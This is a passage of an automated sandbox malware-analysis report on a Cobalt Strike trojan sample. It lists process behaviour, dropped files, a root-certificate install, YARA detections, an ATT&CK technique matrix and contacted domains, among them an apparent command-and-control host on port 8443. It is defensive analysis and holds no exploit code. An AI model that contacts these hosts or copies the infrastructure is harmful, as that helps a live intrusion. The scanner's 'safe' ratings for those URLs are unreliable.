        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemData\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemData.dll VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
        Source: C:\Program Files (x86)\Anycast\Anycast.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
        Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF8B8052834 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF8B8052834
        Source: C:\Users\Public\111.exeCode function: 6_2_004034C5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,6_2_004034C5
        Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: C:\Program Files (x86)\Anycast\Anycast.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B7AB3308D1EA4477BA1480125A6FBDA936490CBB Blob

        Remote Access Functionality

        barindex
        Yara detected CobaltStrike
        Source: Yara matchFile source: 00000004.00000002.4448708010.000002044C399000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.4448461751.000001FF17E24000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.4448642407.000001B79A210000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.4450635070.000001B79C0CB000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.4451432198.000002044E27B000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3436, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4688, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2460, type: MEMORYSTR

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API        		1
        DLL Side-Loading        		1
        Exploitation for Privilege Escalation        		11
        Disable or Modify Tools        		1
        Network Sniffing        		1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		1
        Ingress Tool Transfer        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts1
        Scheduled Task/Job        		11
        Windows Service        		1
        DLL Side-Loading        		2
        Obfuscated Files or Information        		LSASS Memory3
        File and Directory Discovery        		Remote Desktop Protocol1
        Clipboard Data        		1
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts2
        Service Execution        		1
        Scheduled Task/Job        		1
        Access Token Manipulation        		1
        Install Root Certificate        		Security Account Manager1
        Network Sniffing        		SMB/Windows Admin SharesData from Network Shared Drive11
        Non-Standard Port        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCron1
        Registry Run Keys / Startup Folder        		11
        Windows Service        		2
        Software Packing        		NTDS26
        System Information Discovery        		Distributed Component Object ModelInput Capture3
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script112
        Process Injection        		1
        Timestomp        		LSA Secrets1
        Query Registry        		SSHKeylogging13
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
        Scheduled Task/Job        		1
        DLL Side-Loading        		Cached Domain Credentials21
        Security Software Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
        Registry Run Keys / Startup Folder        		112
        Masquerading        		DCSync1
        Process Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        Modify Registry        		Proc Filesystem131
        Virtualization/Sandbox Evasion        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt131
        Virtualization/Sandbox Evasion        		/etc/passwd and /etc/shadow1
        Application Window Discovery        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
        Access Token Manipulation        		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd112
        Process Injection        		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
        Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
        Rundll32        		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1407646 Sample: SecuriteInfo.com.Win32.Troj... Startdate: 12/03/2024 Architecture: WINDOWS Score: 100 75 www.mxilws.buzz 2->75 87 Snort IDS alert for network traffic 2->87 89 Found malware configuration 2->89 91 Malicious sample detected (through community Yara rule) 2->91 93 8 other signatures 2->93 11 loaddll64.exe 1 2->11         started        13 dnscrypt-proxy.exe 2->13         started        17 anycast-service.exe 2->17         started        signatures3 process4 dnsIp5 19 cmd.exe 1 11->19         started        21 rundll32.exe 13 11->21         started        24 rundll32.exe 14 11->24         started        26 24 other processes 11->26 81 zhhxulpbjunysdxu.test.dnscrypt 13->81 83 xztkcmlcydhxptoa.test.dnscrypt 13->83 85 116 other IPs or domains 13->85 105 Installs new ROOT certificates 13->105 signatures6 process7 signatures8 28 rundll32.exe 14 19->28         started        97 System process connects to network (likely due to code injection or exploit) 21->97 99 Opens the same file many times (likely Sandbox evasion) 21->99 32 111.exe 21->32         started        101 Drops PE files to the user root directory 24->101 process9 file10 63 C:\Users\Public\111.exe, PE32 28->63 dropped 65 C:\Users\user\AppData\Local\...\A[1].exe, PE32 28->65 dropped 103 Opens the same file many times (likely Sandbox evasion) 28->103 34 111.exe 10 87 28->34         started        67 C:\Users\user\AppData\Local\...\UserInfo.dll, PE32 32->67 dropped 69 C:\Users\user\AppData\Local\...\System.dll, PE32 32->69 dropped 71 C:\Users\user\AppData\...\InstallOptions.dll, PE32 32->71 dropped 73 C:\Users\user\AppData\...\DotNetChecker.dll, PE32 32->73 dropped 38 cmd.exe 32->38         started        signatures11 process12 file13 55 C:\Program Files (x86)\...\dnscrypt-proxy.exe, PE32 34->55 dropped 57 C:\Program Files (x86)\Anycast\Packet.dll, PE32+ 34->57 dropped 59 C:\Users\user\AppData\Local\...\UserInfo.dll, PE32 34->59 dropped 61 35 other files (none is malicious) 34->61 dropped 95 Install WinpCap (used to filter network traffic) 34->95 40 cmd.exe 34->40         started        42 Anycast.exe 34->42         started        45 conhost.exe 38->45         started        signatures14 process15 dnsIp16 47 conhost.exe 40->47         started        49 anycast-service.exe 40->49         started        51 anycast-service.exe 40->51         started        53 3 other processes 40->53 77 43.128.60.6 LILLY-ASUS Japan 42->77 79 43.159.77.199 LILLY-ASUS Japan 42->79 process17

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll33%ReversingLabs
        SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Program Files (x86)\Anycast\Anycast.exe0%ReversingLabs
        C:\Program Files (x86)\Anycast\Hardcodet.NotifyIcon.Wpf.dll0%ReversingLabs
        C:\Program Files (x86)\Anycast\Microsoft.Bcl.AsyncInterfaces.dll0%ReversingLabs
        C:\Program Files (x86)\Anycast\Newtonsoft.Json.dll0%ReversingLabs
        C:\Program Files (x86)\Anycast\Packet.dll0%ReversingLabs
        C:\Program Files (x86)\Anycast\QRCoder.Xaml.dll0%ReversingLabs
        C:\Program Files (x86)\Anycast\QRCoder.dll0%ReversingLabs
        C:\Program Files (x86)\Anycast\Sentry.dll0%ReversingLabs
        C:\Program Files (x86)\Anycast\System.Buffers.dll0%ReversingLabs
        C:\Program Files (x86)\Anycast\System.Collections.Immutable.dll0%ReversingLabs
        C:\Program Files (x86)\Anycast\System.Configuration.ConfigurationManager.dll0%ReversingLabs
        C:\Program Files (x86)\Anycast\System.Drawing.Common.dll0%ReversingLabs
        C:\Program Files (x86)\Anycast\System.Memory.dll0%ReversingLabs
        C:\Program Files (x86)\Anycast\System.Net.Http.Formatting.dll0%ReversingLabs
        C:\Program Files (x86)\Anycast\System.Numerics.Vectors.dll0%ReversingLabs
        C:\Program Files (x86)\Anycast\System.Reflection.Metadata.dll0%ReversingLabs
        C:\Program Files (x86)\Anycast\System.Runtime.CompilerServices.Unsafe.dll0%ReversingLabs
        C:\Program Files (x86)\Anycast\System.Runtime.InteropServices.RuntimeInformation.dll0%ReversingLabs
        C:\Program Files (x86)\Anycast\System.Security.AccessControl.dll0%ReversingLabs
        C:\Program Files (x86)\Anycast\System.Security.Permissions.dll0%ReversingLabs
        C:\Program Files (x86)\Anycast\System.Security.Principal.Windows.dll0%ReversingLabs
        C:\Program Files (x86)\Anycast\System.Text.Encodings.Web.dll0%ReversingLabs
        C:\Program Files (x86)\Anycast\System.Text.Json.dll0%ReversingLabs
        C:\Program Files (x86)\Anycast\System.Threading.Tasks.Extensions.dll0%ReversingLabs
        C:\Program Files (x86)\Anycast\System.ValueTuple.dll0%ReversingLabs
        C:\Program Files (x86)\Anycast\anycast-service.exe0%ReversingLabs
        C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe0%ReversingLabs
        C:\Program Files (x86)\Anycast\msvcp140.dll0%ReversingLabs
        C:\Program Files (x86)\Anycast\uninst.exe0%ReversingLabs
        C:\Program Files (x86)\Anycast\vcruntime140.dll0%ReversingLabs
        C:\Program Files (x86)\Anycast\vcruntime140_1.dll0%ReversingLabs
        C:\Program Files (x86)\Anycast\wintun.dll0%ReversingLabs
        C:\Program Files (x86)\Anycast\zh-CN\Anycast.resources.dll0%ReversingLabs
        C:\Program Files (x86)\Anycast\zh-TW\Anycast.resources.dll0%ReversingLabs
        C:\Users\Public\111.exe0%ReversingLabs
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\A[1].exe0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\DotNetChecker.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\InstallOptions.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\System.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\UserInfo.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nst31D0.tmp\DotNetChecker.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nst31D0.tmp\InstallOptions.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nst31D0.tmp\System.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nst31D0.tmp\UserInfo.dll0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://ocsps.ssl.com0?0%URL Reputationsafe
        https://www.bortzmeyer.org/doh-bortzmeyer-fr-policy.htmlBlocks0%Avira URL Cloudsafe
        https://101.101.101.101/index_en.html0%Avira URL Cloudsafe
        https://api.tuanleme.nett-0%Avira URL Cloudsafe
        https://dns12.quad9.net:443/dns-query?body_hash=c78c64ca88650bec3d2cd918413a0a0ebfde98804767f31b70f692c81100b27d0%Avira URL Cloudsafe
        http://ocsps.ssl.com0G0%Avira URL Cloudsafe
        https://www.dnscry.ptg0%Avira URL Cloudsafe
        https://snoke.meganerd.nl/dns-query?body_hash=5735ac4be1c662def26216fc98254f5427b9d77985a0e42847d95a219638fb700%Avira URL Cloudsafe
        https://anycast.kb.help/7-%E5%90%88%E4%BC%99%E4%BA%BA%E9%A1%B9%E7%9B%AE/0%Avira URL Cloudsafe
        https://hm2buy.com0%Avira URL Cloudsafe
        https://doh.ffmuc.net/dns-query?dns=yv4BAAABAAAAAAABEHB0bWVkZHRndHNmZHFwd2YEdGVzdAhkbnNjcnlwdAAAAgABAAApEAAAAAAAABQADAAQK5V0BBhEBZ8Md1B7OJ0HFA0%Avira URL Cloudsafe
        https://www.dnscry.ptQ0%Avira URL Cloudsafe
        https://www.dnscry.ptf0%Avira URL Cloudsafe
        https://www.mxilws.buzz:8443/l30%Avira URL Cloudsafe
        https://cryptostorm.is/0%Avira URL Cloudsafe
        https://wikimedia-dns.org/dns-query?body_hash=82e05047d2b9c6ae5833cf65f256043b6cd57ad7255797d4fe9b6a0%Avira URL Cloudsafe
        https://dns.twnic.tw/dns-query?body_hash=b6a4d160e3f7779591b17a40f7957877095f768e0bc5c301bce81f0994efe4050%Avira URL Cloudsafe
        https://dns.digitale-gesellschaft.ch/dns-query?body_hash=da4d7138a52ec640d75a5a99e130651a7b53cf7c9f716ace4d279002a272c8370%Avira URL Cloudsafe
        https://api.fengyunyizu.com/config0%Avira URL Cloudsafe
        https://dnscrypt.be0%Avira URL Cloudsafe
        https://support.anycastjsq.com/?uid=0%Avira URL Cloudsafe
        https://www.dnscry.ptU0%Avira URL Cloudsafe
        https://doh.crypto.sx/dns-query?body_hash=7283a987661a37933060b33e877ff7234cb4c871972a5fa1997ea3275548fdc00%Avira URL Cloudsafe
        https://open.dns0.eu/dns-query?body_hash=bae945a813f58cc2e67d0522b93d79c2fd680b0ef087b502438286048b4b540f0%Avira URL Cloudsafe
        https://helios.plan9-dns.com/dns-query?body_hash=34e8cc3d524217cbae7043173aef953f2496bb8aa70be861ddb0%Avira URL Cloudsafe
        https://ffmuc.net/sdns://AQcAAAAAAAAAGlsyMDAxOjY3ODplNjg6ZjAwMDo6XTo4NDQzIAfQevHP3F2Zdp0_AmaQpwRJZcJ0%Avira URL Cloudsafe
        https://www.dnscry.ptm0%Avira URL Cloudsafe
        https://jp.tiarap.org/dns-query?body_hash=255e4e7acdfe600c5a38889c46de48302b59954def3f99af9c27ca88e50%Avira URL Cloudsafe
        https://kronos.plan9-dns.com/dns-query?body_hash=540bd08e1b8569d15733e05bf790a0aa53f535f759c0f37a33c4aa332d262aaf0%Avira URL Cloudsafe
        https://www.dnscry.ptw0%Avira URL Cloudsafe
        https://www.mxilws.buzz:8443/jquery-3.3.1.min.jsr_0%Avira URL Cloudsafe
        https://puredns.org/family0%Avira URL Cloudsafe
        https://www.mxilws.buzz:8443/jquery-3.3.1.min.js3011b87bd060%Avira URL Cloudsafe
        https://freedns.controld.com/uncensored?dns=yv4BAAABAAAAAAABEHN2dGxyZ3d5dHVqcmJ1cWMEdGVzdAhkbnNjcnlwdAAAAgABAAApEAAAAAAAABQADAAQi6WE31TBzdqqVCvG8H3FAg0%Avira URL Cloudsafe
        https://sdns.360.net/0%Avira URL Cloudsafe
        https://download.dnscrypt.info/resolvers-list/v2/relays.md0%Avira URL Cloudsafe
        https://www.mxilws.buzz:8443/ll0%Avira URL Cloudsafe
        https://www.dnscry.pt%0%Avira URL Cloudsafe
        https://www.dnscry.ptDNSCry.pt0%Avira URL Cloudsafe
        https://www.gombadi.com/edns/edns.html0%Avira URL Cloudsafe
        https://doh.ffmuc.net/dns-query?0%Avira URL Cloudsafe
        https://dnswarden.com0%Avira URL Cloudsafe
        https://pluton.plan9-dns.com/dns-query?dns=yv4BAAABAAAAAAABAAACAAEAACkQAAAAAAAAFAAMABBpaCGnh5SOGdhGb2mDf8Hb0%Avira URL Cloudsafe
        https://www.mxilws.buzz:8443/Z0%Avira URL Cloudsafe
        https://dns.mullvad.net179.61.223.47:443com0%Avira URL Cloudsafe
        https://download.dnscrypt.info/blacklists/0%Avira URL Cloudsafe
        https://ffmuc.net/An0%Avira URL Cloudsafe
        http://127.0.0.1:0%Avira URL Cloudsafe
        https://jp.tiarap.org/dns-query?0%Avira URL Cloudsafe
        https://controld.com/free-dns0%Avira URL Cloudsafe
        https://dnsse.alekberg.net/dns-query?body_hash=591966c1ba1a8275465d446c9aedfd7b6417f9042d2a553d148c3b90117453cf0%Avira URL Cloudsafe
        https://wevpn.com/dns0%Avira URL Cloudsafe
        https://openinternet.io0%Avira URL Cloudsafe
        https://raw.githubusercontent.com/DNSCrypt/dnscrypt-resolvers/master/v2/relays.md.minisig0%Avira URL Cloudsafe
        https://anycast.uncensoreddns.org/dns-query?body_hash=cb617857664fdda434a130542cde67fd85707bbcce70918ef618b4e501b3ad2d0%Avira URL Cloudsafe
        https://www.mxilws.buzz:8443/o0%Avira URL Cloudsafe
        https://open.dns0.eu/dns-query?body_hash=1f30bf3f0c68e293a7e5617cb66b86c359e9ffb70bda638f9b3624cfe8e0831e0%Avira URL Cloudsafe
        https://www.dnscry.pt/0%Avira URL Cloudsafe
        https://185.222.222.222/dns-query?body_hash=d3ee92d3fe71e0b593f9cf819796b311f7a8e4ae21cea285ae4d89746cf0a3df0%Avira URL Cloudsafe
        https://www.dns0.eu/0%Avira URL Cloudsafe
        https://dns.nextdns.io/dnscrypt-proxy?body_hash=670733e200aed9a4f429b7984a02c12e9e960aefea0d76661b1ff693bc6d5c190%Avira URL Cloudsafe
        http://sslcom.ocsp-certum.com080%Avira URL Cloudsafe
        https://www.mxilws.buzz:8443/r0%Avira URL Cloudsafe
        https://www.mxilws.buzz:8443/l0%Avira URL Cloudsafe
        https://www.dnscry.pt80%Avira URL Cloudsafe
        https://www.mxilws.buzz:8443/y0%Avira URL Cloudsafe
        https://dns1.ryan-palmer.com/dns-query?yv4BAAABAAAAAAABAAACAAEAACkQAAAAAAAAFAAMABCd02OLlEQm1pJwTvQcb0%Avira URL Cloudsafe
        https://www.mxilws.buzz:8443/llD0%Avira URL Cloudsafe
        https://www.mxilws.buzz:8443/jquery-3.3.1.min.js3011b87bd06ad9jD0%Avira URL Cloudsafe
        https://cleanbrowsing.org/DNS-over-HTTPS0%Avira URL Cloudsafe
        https://raw.githubusercontent.com/DNSCrypt/dnscrypt-resolvers/master/v2/parental-control.md0%Avira URL Cloudsafe
        http://html4/loose.dtd0%Avira URL Cloudsafe
        https://doh.appliedprivacy.net/query?body_hash=13c96d569f5542e5b37c55a230dfd2e87a18f0e8cba266add5258f12d67bc0000%Avira URL Cloudsafe
        https://ahadns.com/0%Avira URL Cloudsafe
        https://www.dnscry.ptk.0%Avira URL Cloudsafe
        https://dnsnl.alekberg.netDNSC0%Avira URL Cloudsafe
        https://www.mxilws.buzz/70%Avira URL Cloudsafe
        https://www.dnscry.ptsha0%Avira URL Cloudsafe
        https://ibksturm.synology.me:443/dns-query?body_hash=06755ce2d2984c7850d853afcb3425d160ff88080665583e8c7df96d9820f2ee0%Avira URL Cloudsafe
        https://doh.crypto.sx/dns-query?dns=yv4BAAABAAAAAAABEGNra215cXZveGpwZHh4ZXEEdGVzdAhkbnNjcnlwdAAAAgABAAApEAAAAAAAABQADAAQDt0GKHhHtLhiC_vFFWAAwQ0%Avira URL Cloudsafe
        https://www.mxilws.buzz/#0%Avira URL Cloudsafe
        https://cryptostorm.is0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        rjwdtpqwqloqrvxg.test.dnscrypt
        		unknown
        		unknowntrue
          		unknown
          www.mxilws.buzz
          		unknown
          		unknowntrue
            		unknown
            osjuvyiozchfdhzu.test.dnscrypt
            		unknown
            		unknowntrue
              		unknown
              aylnalepiqttafwj.test.dnscrypt
              		unknown
              		unknowntrue
                		unknown
                xztkcmlcydhxptoa.test.dnscrypt
                		unknown
                		unknowntrue
                  		unknown
                  zhhxulpbjunysdxu.test.dnscrypt
                  		unknown
                  		unknowntrue
                    		unknown
                    grkhaqesqkpwfbzj.test.dnscrypt
                    		unknown
                    		unknowntrue
                      		unknown
                      mcnbjggvtqykmrmm.test.dnscrypt
                      		unknown
                      		unknowntrue
                        		unknown
                        rswqoikbsmpyvqzb.test.dnscrypt
                        		unknown
                        		unknowntrue
                          		unknown
                          hemcxhvmjmsyrmhj.test.dnscrypt
                          		unknown
                          		unknowntrue
                            		unknown
                            cthvfbxnofkmrcdd.test.dnscrypt
                            		unknown
                            		unknowntrue
                              		unknown
                              slgbjnlbgjenrrqf.test.dnscrypt
                              		unknown
                              		unknowntrue
                                		unknown
                                ecvfcdsyejuovapu.test.dnscrypt
                                		unknown
                                		unknowntrue
                                  		unknown
                                  lfiovsnzjswbcjxl.test.dnscrypt
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    kebynwagdqnulxdh.test.dnscrypt
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      tbpbvxvlvcmlgnba.test.dnscrypt
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        oqpgvpsfvcymxcwe.test.dnscrypt
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          avczmdgfxudkmncz.test.dnscrypt
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            xoodjwtrxuhqrdmy.test.dnscrypt
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              wttxkeqiublzfbuk.test.dnscrypt
                                              		unknown
                                              		unknowntrue
                                                		unknown

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                https://doh.ffmuc.net/dns-query?dns=yv4BAAABAAAAAAABEHB0bWVkZHRndHNmZHFwd2YEdGVzdAhkbnNjcnlwdAAAAgABAAApEAAAAAAAABQADAAQK5V0BBhEBZ8Md1B7OJ0HFAfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://dns12.quad9.net:443/dns-query?body_hash=c78c64ca88650bec3d2cd918413a0a0ebfde98804767f31b70f692c81100b27dfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://snoke.meganerd.nl/dns-query?body_hash=5735ac4be1c662def26216fc98254f5427b9d77985a0e42847d95a219638fb70false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://dns.twnic.tw/dns-query?body_hash=b6a4d160e3f7779591b17a40f7957877095f768e0bc5c301bce81f0994efe405false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://dns.digitale-gesellschaft.ch/dns-query?body_hash=da4d7138a52ec640d75a5a99e130651a7b53cf7c9f716ace4d279002a272c837false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://doh.crypto.sx/dns-query?body_hash=7283a987661a37933060b33e877ff7234cb4c871972a5fa1997ea3275548fdc0false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://api.fengyunyizu.com/configfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://open.dns0.eu/dns-query?body_hash=bae945a813f58cc2e67d0522b93d79c2fd680b0ef087b502438286048b4b540ffalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://kronos.plan9-dns.com/dns-query?body_hash=540bd08e1b8569d15733e05bf790a0aa53f535f759c0f37a33c4aa332d262aaffalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://freedns.controld.com/uncensored?dns=yv4BAAABAAAAAAABEHN2dGxyZ3d5dHVqcmJ1cWMEdGVzdAhkbnNjcnlwdAAAAgABAAApEAAAAAAAABQADAAQi6WE31TBzdqqVCvG8H3FAgfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://pluton.plan9-dns.com/dns-query?dns=yv4BAAABAAAAAAABAAACAAEAACkQAAAAAAAAFAAMABBpaCGnh5SOGdhGb2mDf8Hbfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://dnsse.alekberg.net/dns-query?body_hash=591966c1ba1a8275465d446c9aedfd7b6417f9042d2a553d148c3b90117453cffalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://anycast.uncensoreddns.org/dns-query?body_hash=cb617857664fdda434a130542cde67fd85707bbcce70918ef618b4e501b3ad2dfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://raw.githubusercontent.com/DNSCrypt/dnscrypt-resolvers/master/v2/relays.md.minisigfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://open.dns0.eu/dns-query?body_hash=1f30bf3f0c68e293a7e5617cb66b86c359e9ffb70bda638f9b3624cfe8e0831efalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://185.222.222.222/dns-query?body_hash=d3ee92d3fe71e0b593f9cf819796b311f7a8e4ae21cea285ae4d89746cf0a3dffalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://dns.nextdns.io/dnscrypt-proxy?body_hash=670733e200aed9a4f429b7984a02c12e9e960aefea0d76661b1ff693bc6d5c19false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://ns0.fdn.fr/dns-query?body_hash=c4590e78ee3e001a86c74ded2dba36c5a0c2822cfedb83a7c5b9d427c048f983false
                                                  		high
